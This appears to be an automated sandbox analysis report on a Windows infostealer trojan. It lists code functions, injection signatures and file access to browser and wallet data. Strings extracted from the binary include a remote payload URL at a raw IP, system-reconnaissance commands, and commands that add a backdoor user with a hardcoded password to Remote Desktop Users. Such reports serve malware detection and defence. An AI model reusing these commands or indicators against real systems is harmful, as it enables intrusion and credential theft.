    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeCode function: 0_2_00007FF7F128D31C0_2_00007FF7F128D31C
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeCode function: 0_2_00007FF7F12D93700_2_00007FF7F12D9370
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeCode function: 0_2_00007FF7F13076C40_2_00007FF7F13076C4
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeCode function: 0_2_00007FF7F12AB6B00_2_00007FF7F12AB6B0
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeCode function: 0_2_00007FF7F12856A00_2_00007FF7F12856A0
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeCode function: 0_2_00007FF7F13195D40_2_00007FF7F13195D4
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeCode function: 0_2_00007FF7F128B8740_2_00007FF7F128B874
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeCode function: 0_2_00007FF7F12EF7300_2_00007FF7F12EF730
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeCode function: 0_2_00007FF7F13237E80_2_00007FF7F13237E8
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeCode function: 0_2_00007FF7F13118100_2_00007FF7F1311810
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeCode function: 0_2_00007FF7F13299F40_2_00007FF7F13299F4
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeCode function: 0_2_00007FF7F13279B80_2_00007FF7F13279B8
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeCode function: 0_2_00007FF7F1307D080_2_00007FF7F1307D08
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeCode function: 0_2_00007FF7F12F7B500_2_00007FF7F12F7B50
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeCode function: 0_2_00007FF7F1321B600_2_00007FF7F1321B60
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeCode function: 0_2_00007FF7F128DE8C0_2_00007FF7F128DE8C
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeCode function: 0_2_00007FF7F129DED00_2_00007FF7F129DED0
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeCode function: 0_2_00007FF7F12CFEC00_2_00007FF7F12CFEC0
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeCode function: 0_2_00007FF7F12F9EB00_2_00007FF7F12F9EB0
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeCode function: 0_2_00007FF7F130DD780_2_00007FF7F130DD78
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeCode function: 0_2_00007FF7F12F7DD00_2_00007FF7F12F7DD0
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeCode function: 0_2_00007FF7F1315DC40_2_00007FF7F1315DC4
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeCode function: 0_2_00007FF7F130808C0_2_00007FF7F130808C
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeCode function: 0_2_00007FF7F12860600_2_00007FF7F1286060
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeCode function: 0_2_00007FF7F12F9F200_2_00007FF7F12F9F20
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeCode function: 0_2_00007FF7F131FF300_2_00007FF7F131FF30
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeCode function: 0_2_00007FF7F12C3FB00_2_00007FF7F12C3FB0
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeCode function: 0_2_00007FF7F12BBFE00_2_00007FF7F12BBFE0
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeCode function: 0_2_00007FF7F130E2840_2_00007FF7F130E284
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeCode function: 0_2_00007FF7F12882180_2_00007FF7F1288218
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeCode function: 0_2_00007FF7F12DE2700_2_00007FF7F12DE270
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeCode function: 0_2_00007FF7F13101B00_2_00007FF7F13101B0
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeCode function: 0_2_00007FF7F13284A00_2_00007FF7F13284A0
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeCode function: 0_2_00007FF7F131E6880_2_00007FF7F131E688
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeCode function: 0_2_00007FF7F13206380_2_00007FF7F1320638
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeCode function: 0_2_00007FF7F13085940_2_00007FF7F1308594
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeCode function: 0_2_00007FF7F131860C0_2_00007FF7F131860C
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeCode function: 0_2_00007FF7F131A6100_2_00007FF7F131A610
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeCode function: 0_2_00007FF7F12AC8300_2_00007FF7F12AC830
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeCode function: 0_2_00007FF7F12EC7500_2_00007FF7F12EC750
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeCode function: 0_2_00007FF7F13107F80_2_00007FF7F13107F8
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeCode function: 0_2_00007FF7F1314A7C0_2_00007FF7F1314A7C
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeCode function: 0_2_00007FF7F12C6AE00_2_00007FF7F12C6AE0
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeCode function: 0_2_00007FF7F1326AD00_2_00007FF7F1326AD0
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeCode function: 0_2_00007FF7F12D29300_2_00007FF7F12D2930
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeCode function: 0_2_00007FF7F12AACF00_2_00007FF7F12AACF0
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeCode function: 0_2_00007FF7F12E6B200_2_00007FF7F12E6B20
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeCode function: 0_2_00007FF7F131EB1C0_2_00007FF7F131EB1C
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeCode function: 0_2_00007FF7F1292E8C0_2_00007FF7F1292E8C
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeCode function: 0_2_00007FF7F132CE340_2_00007FF7F132CE34
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeCode function: 0_2_00007FF7F1324E540_2_00007FF7F1324E54
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeCode function: 0_2_00007FF7F1318D940_2_00007FF7F1318D94
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeCode function: 0_2_00007FF7F1322DE80_2_00007FF7F1322DE8
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeCode function: 0_2_00007FF7F13210400_2_00007FF7F1321040
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeCode function: String function: 00007FF7F12AF830 appears 52 times
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeCode function: String function: 00007FF7F12C75A0 appears 41 times
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeCode function: String function: 00007FF7F12FA4EC appears 38 times
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeCode function: String function: 00007FF7F132CC4C appears 73 times
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeCode function: String function: 00007FF7F12AF9A0 appears 44 times
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeCode function: String function: 00007FF7F12B61B0 appears 37 times
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeCode function: String function: 00007FF7F12B6220 appears 83 times
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeCode function: String function: 00007FF7F1297150 appears 45 times
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeCode function: String function: 00007FF7F12AF6F0 appears 449 times
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeCode function: String function: 00007FF7F12AF7E0 appears 332 times
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeCode function: String function: 00007FF7F128A7DC appears 56 times
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeCode function: String function: 00007FF7F12C7670 appears 39 times
    Source: CwQQqCmqkY.exe, type: SAMPLEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
    Source: 0.0.CwQQqCmqkY.exe.7ff7f1280000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
    Source: 0.2.CwQQqCmqkY.exe.7ff7f1280000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
    Source: classification engineClassification label: mal96.troj.spyw.winEXE@1/38@0/1
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeFile created: C:\Users\user\AppData\Local\863CAFA4A9062357328583Jump to behavior
    Source: CwQQqCmqkY.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: CwQQqCmqkY.exeVirustotal: Detection: 26%
    Source: CwQQqCmqkY.exeReversingLabs: Detection: 52%
    Source: CwQQqCmqkY.exeString found in binary or memory: /add
    Source: CwQQqCmqkY.exeString found in binary or memory: iphlpapi.dllif_nametoindexkernel32LoadLibraryExA\/AddDllDirectoryh1h2h3%10s %512s %u %10s %512s %u "%64[^"]" %u %urt%s %s%s%s %u %s %s%s%s %u "%d%02d%02d %02d:%02d:%02d" %u %u
    Source: CwQQqCmqkY.exeString found in binary or memory: /add
    Source: CwQQqCmqkY.exeString found in binary or memory: @Software\Dxiapp1Diamotrix_SDiamotrixGDU9MUEoLj86KxEsBAEdIA0KACc=DiamotrixFyYnOTg1ICwkGD8sGg4GF0VYDQcCQzMoJCQPJRsETTsbHQULntdll.dllRtlAdjustPrivilegeNtRaiseHardErrorSoftware\ccxccxccxRunOnce\\LogFile.zipLogFile.zipimage/jpeg\Screenshot.jpghttp://185.81.68.147/psw.exeDiamotrixGDU1CAMRFRsZKUklCBwfBgYIGDUVCQ4AEw==DiamotrixGDUFBBwXHRscGDUtAgwVHkkrMAYTDAgRLjUUIR8EAQsWDiamotrixMAwMHQ==DiamotrixMRoEHzAQEx0ZDiamotrixMRoEHzAQEx0ZZ1s=DiamotrixMRoEHzAQEx0ZZ1o=DiamotrixMRoEHzAQEx0ZZ10=DiamotrixIQQOBwY=DiamotrixMwwDGwYRBQ==User Name: Computer Name: HWID: .Windows Version: Install Path: Processor Architecture: Page Size: Number of Processors: Processor Type: MBRAM Size: x Screen Resolution: System Language: BIOS Version: %s\Windows\Users\Program Files\\Program Files (x86)\PerfLogs$Recycle.BinBoot%s\%s%s\*%s\%s.txt.jpg.pdf.docx.csv.sql.db.py.cpp.h.dat.wallet.pkey...%s\%scmd.exe/c opentasklist > Running_processes.txttasklist /v > Open_windows.txtdriverquery > Drivers.txtwmic product get name,version > Installed_apps.txtsysteminfo > Info.txtipconfig /all > Network.txtfor /d %i in (C:\Users\*) do if not "%i"=="C:\Users\Public" tree /F /A "%i" >> DirectoriesAndFiles.txtDiamotrixeWMhydGcXFEz2CLrVL /add net user /addnet localgroup "Remote Desktop Users" \Wallets\WalletsMessengers\MessengersSystem_info.txtRDP.txtRDP detected, user: Diamorix | pass: eWMhydGcXFEz2CLrVLFile_Grabber\File_Grabber Mot qui, plac
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeSection loaded: windowscodecs.dllJump to behavior
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeSection loaded: secur32.dllJump to behavior
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: CwQQqCmqkY.exeStatic PE information: Image base 0x140000000 > 0x60000000
    Source: CwQQqCmqkY.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
    Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831sD source: CwQQqCmqkY.exe, 00000000.00000002.2327500005.000001D1BDD64000.00000004.00000020.00020000.00000000.sdmp
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeCode function: 0_2_00007FF7F12B3E20 WSAStartup,WSACleanup,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryExA,GetSystemDirectoryA,GetSystemDirectoryA,LoadLibraryA,GetProcAddress,QueryPerformanceFrequency,0_2_00007FF7F12B3E20
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeCode function: 0_2_00007FF7F129D51C push rsp; ret 0_2_00007FF7F129D525
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeFile created: C:\Users\user\AppData\Local\863CAFA4A9062357328583\File_Grabber\miniwallet.bundle.js.LICENSE.txtJump to behavior
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeFile created: C:\Users\user\AppData\Local\863CAFA4A9062357328583\File_Grabber\notification_fast.bundle.js.LICENSE.txtJump to behavior
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeCode function: 0_2_00007FF7F132DDD8 wsprintfW,FindFirstFileW,wsprintfW,PathFindExtensionW,StrCmpIW,StrCmpIW,StrCmpIW,StrCmpIW,StrCmpIW,StrCmpIW,StrCmpIW,StrCmpIW,StrCmpIW,StrCmpIW,StrCmpIW,StrCmpIW,StrCmpIW,wsprintfW,FindNextFileW,FindClose,0_2_00007FF7F132DDD8
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeCode function: 0_2_00007FF7F1330138 FindFirstFileW,CreateDirectoryW,CopyFileW,FindNextFileW,FindClose,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF7F1330138
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeCode function: 0_2_00007FF7F13306C8 FindFirstFileW,CreateDirectoryW,CopyFileW,FindNextFileW,FindClose,_invalid_parameter_noinfo_noreturn,0_2_00007FF7F13306C8
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeCode function: 0_2_00007FF7F13309A4 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,FindClose,0_2_00007FF7F13309A4
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeCode function: 0_2_00007FF7F1321B60 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00007FF7F1321B60
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeCode function: 0_2_00007FF7F132E23C GetSystemInfo,GlobalMemoryStatusEx,GetUserDefaultUILanguage,GetDesktopWindow,GetClientRect,GetUserNameA,GetComputerNameA,GetVersionExA,GetCurrentHwProfileA,GetModuleFileNameA,GetLocaleInfoEx,GetSystemFirmwareTable,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SetCurrentDirectoryW,CreateDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,CreateDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,CreateDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,GetSystemMetrics,CreateDirectoryW,SetCurrentDirectoryW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF7F132E23C
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIAJump to behavior
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeFile opened: C:\Users\user\AppData\Local\Adobe\AcrobatJump to behavior
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\AcrobatJump to behavior
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DCJump to behavior
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\FilesJump to behavior
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\CacheJump to behavior
    Source: CwQQqCmqkY.exe, 00000000.00000002.2327500005.000001D1BDD64000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll4Ua<~P
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeCode function: 0_2_00007FF7F12FAB08 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF7F12FAB08
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeCode function: 0_2_00007FF7F12B3E20 WSAStartup,WSACleanup,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryExA,GetSystemDirectoryA,GetSystemDirectoryA,LoadLibraryA,GetProcAddress,QueryPerformanceFrequency,0_2_00007FF7F12B3E20
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeCode function: 0_2_00007FF7F1326144 GetProcessHeap,0_2_00007FF7F1326144
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeCode function: 0_2_00007FF7F12FA760 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF7F12FA760
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeCode function: 0_2_00007FF7F12FAB08 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF7F12FAB08
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeCode function: 0_2_00007FF7F12FACE8 SetUnhandledExceptionFilter,0_2_00007FF7F12FACE8
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeCode function: 0_2_00007FF7F1302F3C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF7F1302F3C
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeCode function: 0_2_00007FF7F132BED0 cpuid 0_2_00007FF7F132BED0
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeCode function: GetSystemInfo,GlobalMemoryStatusEx,GetUserDefaultUILanguage,GetDesktopWindow,GetClientRect,GetUserNameA,GetComputerNameA,GetVersionExA,GetCurrentHwProfileA,GetModuleFileNameA,GetLocaleInfoEx,GetSystemFirmwareTable,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SetCurrentDirectoryW,CreateDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,CreateDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,CreateDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,GetSystemMetrics,CreateDirectoryW,SetCurrentDirectoryW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF7F132E23C
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeCode function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,0_2_00007FF7F13253E4
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_00007FF7F13258A8
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeCode function: EnumSystemLocalesW,0_2_00007FF7F1325740
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeCode function: EnumSystemLocalesW,0_2_00007FF7F1325810
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeCode function: GetLocaleInfoW,0_2_00007FF7F1325AF0
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_00007FF7F1325C48
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeCode function: GetLocaleInfoW,0_2_00007FF7F1325CF8
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeCode function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_00007FF7F1325E2C
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeCode function: EnumSystemLocalesW,0_2_00007FF7F131BDB0
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeCode function: GetLocaleInfoW,0_2_00007FF7F131C348
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeCode function: 0_2_00007FF7F130AA9C GetSystemTimeAsFileTime,0_2_00007FF7F130AA9C
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeCode function: 0_2_00007FF7F132E23C GetSystemInfo,GlobalMemoryStatusEx,GetUserDefaultUILanguage,GetDesktopWindow,GetClientRect,GetUserNameA,GetComputerNameA,GetVersionExA,GetCurrentHwProfileA,GetModuleFileNameA,GetLocaleInfoEx,GetSystemFirmwareTable,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SetCurrentDirectoryW,CreateDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,CreateDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,CreateDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,GetSystemMetrics,CreateDirectoryW,SetCurrentDirectoryW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF7F132E23C
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeCode function: 0_2_00007FF7F132773C _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,0_2_00007FF7F132773C
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeCode function: 0_2_00007FF7F132E23C GetSystemInfo,GlobalMemoryStatusEx,GetUserDefaultUILanguage,GetDesktopWindow,GetClientRect,GetUserNameA,GetComputerNameA,GetVersionExA,GetCurrentHwProfileA,GetModuleFileNameA,GetLocaleInfoEx,GetSystemFirmwareTable,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SetCurrentDirectoryW,CreateDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,CreateDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,CreateDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,GetSystemMetrics,CreateDirectoryW,SetCurrentDirectoryW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF7F132E23C

    Stealing of Sensitive Information

    barindex
    Source: Yara matchFile source: Process Memory Space: CwQQqCmqkY.exe PID: 4144, type: MEMORYSTR
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Mozilla\FirefoxJump to behavior
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\ShaderCacheJump to behavior
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\MEIPreloadJump to behavior
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\ZxcvbnDataJump to behavior
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User DataJump to behavior
    Source: C:\Users\user\Desktop\CwQQqCmqkY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\hyphen-dataJump to behavior
